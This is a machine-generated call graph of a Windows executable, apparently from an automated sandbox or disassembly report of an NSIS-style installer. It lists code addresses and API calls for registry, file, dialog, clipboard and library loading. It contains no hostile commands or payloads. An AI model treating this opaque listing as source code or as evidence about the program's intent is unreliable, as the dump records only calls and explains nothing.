lstrcpynW 4338->4378 4343 4045ce 4339->4343 4344 4046b7 SetDlgItemTextW 4340->4344 4349 406831 18 API calls 4340->4349 4342->4330 4376 403dc4 SendMessageW 4343->4376 4344->4313 4345 404712 4347 406328 3 API calls 4345->4347 4356 40471a 4347->4356 4348 4045d6 4350 406328 3 API calls 4348->4350 4351 40469f lstrcmpiW 4349->4351 4350->4314 4351->4344 4354 4046b0 lstrcatW 4351->4354 4352 40475c 4379 406035 lstrcpynW 4352->4379 4354->4344 4355 404765 4357 405d85 4 API calls 4355->4357 4356->4352 4360 40677d 2 API calls 4356->4360 4362 4047b1 4356->4362 4358 40476b GetDiskFreeSpaceW 4357->4358 4361 40478f MulDiv 4358->4361 4358->4362 4360->4356 4361->4362 4363 40480e 4362->4363 4380 4043d9 4362->4380 4364 404831 4363->4364 4366 40141d 80 API calls 4363->4366 4388 403db1 KiUserCallbackDispatcher 4364->4388 4366->4364 4367 4047ff 4369 404810 SetDlgItemTextW 4367->4369 4370 404804 4367->4370 4369->4363 4372 4043d9 21 API calls 4370->4372 4371 40484d 4371->4373 4389 403d8d 4371->4389 4372->4363 4373->4324 4375->4315 4376->4348 4377->4323 4378->4345 4379->4355 4381 4043f9 4380->4381 4382 406831 18 API calls 4381->4382 4383 404439 4382->4383 4384 406831 18 API calls 4383->4384 4385 404444 4384->4385 4386 406831 18 API calls 4385->4386 4387 404454 lstrlenW wsprintfW SetDlgItemTextW 4386->4387 4387->4367 4388->4371 4390 403da0 SendMessageW 4389->4390 4391 403d9b 4389->4391 4390->4373 4391->4390 4392 401dd3 4393 401446 18 API calls 4392->4393 4394 401dda 4393->4394 4395 401446 18 API calls 4394->4395 4396 4018d3 4395->4396 4397 402e55 4398 40145c 18 API calls 4397->4398 4399 402e63 4398->4399 4400 402e79 4399->4400 4401 40145c 18 API calls 4399->4401 4402 405e5c 2 API calls 4400->4402 4401->4400 4403 402e7f 4402->4403 4427 405e7c GetFileAttributesW CreateFileW 4403->4427 4405 402e8c 4406 402f35 4405->4406 4407 402e98 GlobalAlloc 4405->4407 4410 4062cf 11 API calls 4406->4410 4408 402eb1 4407->4408 4409 402f2c CloseHandle 4407->4409 4428 403368 SetFilePointer 4408->4428 4409->4406 4412 402f45 4410->4412 4414 402f50 DeleteFileW 4412->4414 4415 402f63 4412->4415 4413 402eb7 4416 403336 ReadFile 4413->4416 4414->4415 4429 401435 4415->4429 4418 402ec0 GlobalAlloc 4416->4418 4419 402ed0 4418->4419 4420 402f04 WriteFile GlobalFree 4418->4420 4422 40337f 33 API calls 4419->4422 4421 40337f 33 API calls 4420->4421 4423 402f29 4421->4423 4426 402edd 4422->4426 4423->4409 4425 402efb GlobalFree 4425->4420 4426->4425 4427->4405 4428->4413 4430 404f9e 25 API calls 4429->4430 4431 401443 4430->4431 4432 401cd5 4433 401446 18 API calls 4432->4433 4434 401cdd 4433->4434 4435 401446 18 API calls 4434->4435 4436 401ce8 4435->4436 4437 40145c 18 API calls 4436->4437 4438 401cf1 4437->4438 4439 401d07 lstrlenW 4438->4439 4440 401d43 4438->4440 4441 401d11 4439->4441 4441->4440 4445 406035 lstrcpynW 4441->4445 4443 401d2c 4443->4440 4444 401d39 lstrlenW 4443->4444 4444->4440 4445->4443 4446 402cd7 4447 401446 18 API calls 4446->4447 4449 402c64 4447->4449 4448 402d17 ReadFile 4448->4449 4449->4446 4449->4448 4450 402d99 4449->4450 4451 402dd8 4452 4030e3 4451->4452 4453 402ddf 4451->4453 4454 402de5 FindClose 4453->4454 4454->4452 4455 401d5c 4456 40145c 18 API calls 4455->4456 4457 401d63 4456->4457 4458 40145c 18 API calls 4457->4458 4459 401d6c 4458->4459 4460 401d73 lstrcmpiW 4459->4460 4461 401d86 lstrcmpW 4459->4461 4462 401d79 4460->4462 4461->4462 4463 401c99 4461->4463 4462->4461 4462->4463 4464 4027e3 4465 4027e9 4464->4465 4466 4027f2 4465->4466 4467 402836 4465->4467 4480 401553 4466->4480 4468 40145c 18 API calls 4467->4468 4470 40283d 4468->4470 4472 4062cf 11 API calls 4470->4472 4471 4027f9 4473 40145c 18 API calls 4471->4473 4477 401a13 4471->4477 4474 40284d 4472->4474 4475 40280a RegDeleteValueW 4473->4475 4484 40149d RegOpenKeyExW 4474->4484 4476 4062cf 11 API calls 4475->4476 4479 40282a RegCloseKey 4476->4479 4479->4477 4481 401563 4480->4481 4482 40145c 18 API calls 4481->4482 4483 401589 RegOpenKeyExW 4482->4483 4483->4471 4487 4014c9 4484->4487 4492 401515 4484->4492 4485 4014ef RegEnumKeyW 4486 401501 RegCloseKey 4485->4486 4485->4487 4489 406328 3 API calls 4486->4489 4487->4485 4487->4486 4488 401526 RegCloseKey 4487->4488 4490 40149d 3 API calls 4487->4490 4488->4492 4491 401511 4489->4491 4490->4487 4491->4492 4493 401541 RegDeleteKeyW 4491->4493 4492->4477 4493->4492 4494 4040e4 4495 4040ff 4494->4495 4501 40422d 4494->4501 4497 40413a 4495->4497 4525 403ff6 WideCharToMultiByte 4495->4525 4496 404298 4498 40436a 4496->4498 4499 4042a2 GetDlgItem 4496->4499 4505 403d6b 19 API calls 4497->4505 4506 403df6 8 API calls 4498->4506 4502 40432b 4499->4502 4503 4042bc 4499->4503 4501->4496 4501->4498 4504 404267 GetDlgItem SendMessageW 4501->4504 4502->4498 4507 40433d 4502->4507 4503->4502 4511 4042e2 6 API calls 4503->4511 4530 403db1 KiUserCallbackDispatcher 4504->4530 4509 40417a 4505->4509 4510 404365 4506->4510 4512 404353 4507->4512 4513 404343 SendMessageW 4507->4513 4515 403d6b 19 API calls 4509->4515 4511->4502 4512->4510 4516 404359 SendMessageW 4512->4516 4513->4512 4514 404293 4517 403d8d SendMessageW 4514->4517 4518 404187 CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv 